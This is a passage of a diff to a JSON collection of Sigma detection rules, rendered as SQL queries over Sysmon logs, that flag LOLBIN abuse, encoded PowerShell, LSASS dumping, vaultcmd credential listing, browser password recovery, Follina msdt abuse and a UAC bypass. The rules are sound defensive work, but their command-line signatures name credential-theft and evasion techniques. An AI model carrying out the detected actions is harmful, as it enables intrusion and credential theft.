'%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" + "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" }, { - "title": "Use of OpenConsole", - "id": "814c95cc-8192-4378-a70a-f1aafd877af1", + "title": "PUA - WebBrowserPassView Execution", + "id": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", "status": "experimental", - "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.t1555.003" ], "falsepositives": [ - "Legitimate use by an administrator" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'OpenConsole.exe' OR Image LIKE '%\\\\OpenConsole.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.WindowsTerminal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Web Browser Password Viewer' OR Image LIKE '%\\\\WebBrowserPassView.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_openconsole.yml" + "filename": "proc_creation_win_pua_webbrowserpassview.yml" }, { - "title": "Local Accounts Discovery", - "id": "502b42de-4306-40b4-9596-6f590c81f073", - "status": "test", - "description": "Local accounts, System Owner/User discovery using operating systems utilities", - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "title": "Potential Arbitrary Command Execution Using Msdt.EXE", + "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "status": "experimental", + "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033", - "attack.t1087.001" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate administrator or user enumerates local users for legitimate reason" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% /c%' ESCAPE '\\' AND CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Users\\\\%' ESCAPE '\\') AND NOT (CommandLine LIKE '% rmdir %' ESCAPE '\\')) OR (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '%user%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%/domain%' ESCAPE '\\' OR CommandLine LIKE '%/add%' ESCAPE '\\' OR CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/active%' ESCAPE '\\' OR CommandLine LIKE '%/expires%' ESCAPE '\\' OR CommandLine LIKE '%/passwordreq%' ESCAPE '\\' OR CommandLine LIKE '%/scriptpath%' ESCAPE '\\' OR CommandLine LIKE '%/times%' ESCAPE '\\' OR CommandLine LIKE '%/workstations%' ESCAPE '\\'))) OR (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\quser.exe' ESCAPE '\\' OR Image LIKE '%\\\\qwinsta.exe' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%useraccount%' ESCAPE '\\' AND CommandLine LIKE '%get%' ESCAPE '\\') OR (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' AND CommandLine LIKE '% /l%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_local_system_owner_account_discovery.yml" + "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" }, { - "title": "CobaltStrike Load by Rundll32", - "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", + "title": "Application Whitelisting Bypass via Bginfo", + "id": "aaf46cdc-934e-4284-b329-34aa701e3771", "status": "test", - "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", - "author": "Wojciech Lesicki", + "description": "Execute VBscript code that is referenced within the *.bgi file.", + "author": "Beyu Denis, oscd.community", "tags": [ + "attack.execution", + "attack.t1059.005", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\bginfo.exe' ESCAPE '\\' AND CommandLine LIKE '%/popup%' ESCAPE '\\' AND CommandLine LIKE '%/nolicprompt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" + "filename": "proc_creation_win_lolbin_bginfo.yml" }, { - "title": "Renamed Remote Utilities RAT (RURAT) Execution", - "id": "9ef27c24-4903-4192-881a-3adde7ff92a5", - "status": "experimental", - "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "New Firewall Rule Added Via Netsh.EXE", + "id": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "status": "test", + "description": "Detects the addition of a new rule to the Windows firewall via netsh", + "author": "Markus Neis, Sander Wiebing", "tags": [ "attack.defense_evasion", - "attack.collection", - "attack.command_and_control", - "attack.discovery", - "attack.s0592" + "attack.t1562.004" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity", + "Software installations and removal" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Remote Utilities' AND NOT ((Image LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR Image LIKE '%\\\\rfusclient.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% firewall %' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\' OR CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\thor64.exe' ESCAPE '\\' AND CommandLine LIKE '%advfirewall firewall show rule name=all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_rurat.yml" + "filename": "proc_creation_win_netsh_fw_add_rule.yml" }, { - "title": "IIS Native-Code Module Command Line Installation", - "id": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", + "title": "Ping Hex IP", + "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", "status": "test", - "description": "Detects suspicious IIS native-code module installations via command line", + "description": "Detects a ping command that uses a hex encoded IP address", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.defense_evasion", + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' AND CommandLine LIKE '%module%' ESCAPE '\\' AND (CommandLine LIKE '%/name:%' ESCAPE '\\' OR CommandLine LIKE '%-name:%' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_iis_appcmd_susp_module_install.yml" + "filename": "proc_creation_win_ping_hex_ip.yml" }, { - "title": "MSHTA Suspicious Execution 01", - "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", - "status": "test", - "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", - "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", + "title": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", + "id": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "status": "experimental", + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1140", - "attack.t1218.005", - "attack.execution", - "attack.t1059.007", - "cve.2020.1599" + "attack.t1218", + "attack.t1216" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\SyncAppvPublishingServer.vbs%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_susp_execution.yml" + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" }, { - "title": "Execute Files with Msdeploy.exe", - "id": "646bc99f-6682-4b47-a73a-17b1b64c9d34", + "title": "MMC Spawning Windows Shell", + "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", "status": "test", - "description": "Detects file execution using the msdeploy.exe lolbin", - "author": "Beyu Denis, oscd.community", + "description": "Detects a Windows command line executable started from MMC", + "author": "Karneades, Swisscom CSIRT", "tags": [ - "attack.execution", - "attack.t1218" - ], - "falsepositives": [ - "System administrator Usage" + "attack.lateral_movement", + "attack.t1021.003" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%verb:sync%' ESCAPE '\\' AND CommandLine LIKE '%-source:RunCommand%' ESCAPE '\\' AND CommandLine LIKE '%-dest:runCommand%' ESCAPE '\\' AND Image LIKE '%\\\\msdeploy.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR Image LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_msdeploy.yml" + "filename": "proc_creation_win_mmc_susp_child_process.yml" }, { - "title": "Active Directory Database Snapshot Via ADExplorer", - "id": "9212f354-7775-4e28-9c9f-8f0a4544e664", + "title": "Windows Credential Manager Access via VaultCmd", + "id": "58f50261-c53b-4c88-bd12-1d71f12eda4c", "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.t1555.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VaultCmd.exe' ESCAPE '\\' OR OriginalFileName = 'VAULTCMD.EXE') AND CommandLine LIKE '%/listcreds:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_adexplorer_execution.yml" + "filename": "proc_creation_win_vaultcmd_list_creds.yml" }, { - "title": "PUA- IOX Tunneling Tool Execution", - "id": "d7654f02-e04b-4934-9838-65c46f187ebc", - "status": "experimental", - "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "title": "UAC Bypass via Event Viewer", + "id": "be344333-921d-4c4d-8bb8-e584cf584780", + "status": "test", + "description": "Detects UAC bypass method using Windows event viewer", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\SysWOW64\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_iox.yml" + "filename": "proc_creation_win_uac_bypass_eventvwr.yml" }, { - "title": "Suspicious File Characteristics Due to Missing Fields", - "id": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", - "status": "test", - "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", - "author": "Markus Neis, Sander Wiebing", + "title": "Mstsc.EXE Execution With Local RDP File", + "id": "5fdce3ac-e7f9-4ecd-a3aa-a4d78ebbf0af", + "status": "experimental", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file", + "author": "Nasreddine Bencherchali (Nextron Systems), Christopher Peacock @securepeacock", "tags": [ - "attack.execution", - "attack.t1059.006" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Likely with legitimate usage of \".rdp\" files" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Description LIKE '\\?' ESCAPE '\\' AND FileVersion LIKE '\\?' ESCAPE '\\') OR (Description LIKE '\\?' ESCAPE '\\' AND Product LIKE '\\?' ESCAPE '\\')) OR (Description LIKE '\\?' ESCAPE '\\' AND Company LIKE '\\?' ESCAPE '\\')) AND Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND (CommandLine LIKE '%.rdp' ESCAPE '\\' OR CommandLine LIKE '%.rdp\"' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Microsoft\\\\WSL\\\\wslg.rdp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_file_characteristics.yml" + "filename": "proc_creation_win_mstsc_run_local_rdp_file.yml" }, { - "title": "AgentExecutor PowerShell Execution", - "id": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", - "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "title": "Potential LSASS Process Dump Via Procdump", + "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "status": "stable", + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Legitimate use via Intune management. You exclude script paths and names to reduce FP rate" + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_agentexecutor.yml" + "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" }, { - "title": "UtilityFunctions.ps1 Proxy Dll", - "id": "0403d67d-6227-4ea8-8145-4e72db7da120", + "title": "Use of Remote.exe", + "id": "4eddc365-79b4-43ff-a9d7-99422dc34b93", "status": "experimental", - "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", - "author": "frack113", + "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%UtilityFunctions.ps1%' ESCAPE '\\' OR CommandLine LIKE '%RegSnapin %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\remote.exe' ESCAPE '\\' OR OriginalFileName = 'remote.exe'))" ], - "filename": "proc_creation_win_lolbin_utilityfunctions.yml" + "filename": "proc_creation_win_lolbin_remote.yml" }, { - "title": "Run PowerShell Script from ADS", - "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", + "title": "Unmount Share Via Net.EXE", + "id": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", "status": "test", - "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", - "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", + "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1070.005" ], "falsepositives": [ - "Unknown" + "Administrators or Power users may remove their shares via cmd line" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%share%' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_run_script_from_ads.yml" + "filename": "proc_creation_win_net_share_unmount.yml" }, { - "title": "Suspicious Use of CSharp Interactive Console", - "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", - "status": "test", - "description": "Detects the execution of CSharp interactive console by PowerShell", - "author": "Michael R. (@nahamike01)", + "title": "HackTool - TruffleSnout Execution", + "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "status": "experimental", + "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1127" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'TruffleSnout.exe' OR Image LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csi_use_of_csharp_console.yml" + "filename": "proc_creation_win_hktl_trufflesnout.yml" }, { - "title": "Whoami Utility Execution", - "id": "e28a5a99-da44-436d-b7a0-2afc20a5f413", - "status": "test", - "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Obfuscated IP Via CLI", + "id": "56d19cb4-6414-4769-9644-1ed35ffbb148", + "status": "experimental", + "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) via commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.discovery" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\') AND (CommandLine LIKE '% 0x%' ESCAPE '\\' OR CommandLine REGEXP ' [0-9]{7,13}'))" ], - "filename": "proc_creation_win_whoami_execution.yml" + "filename": "proc_creation_win_susp_obfuscated_ip_via_cli.yml" }, { - "title": "Hardware Model Reconnaissance Via Wmic.EXE", - "id": "3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", + "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", + "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", "status": "experimental", - "description": "Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information", + "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account 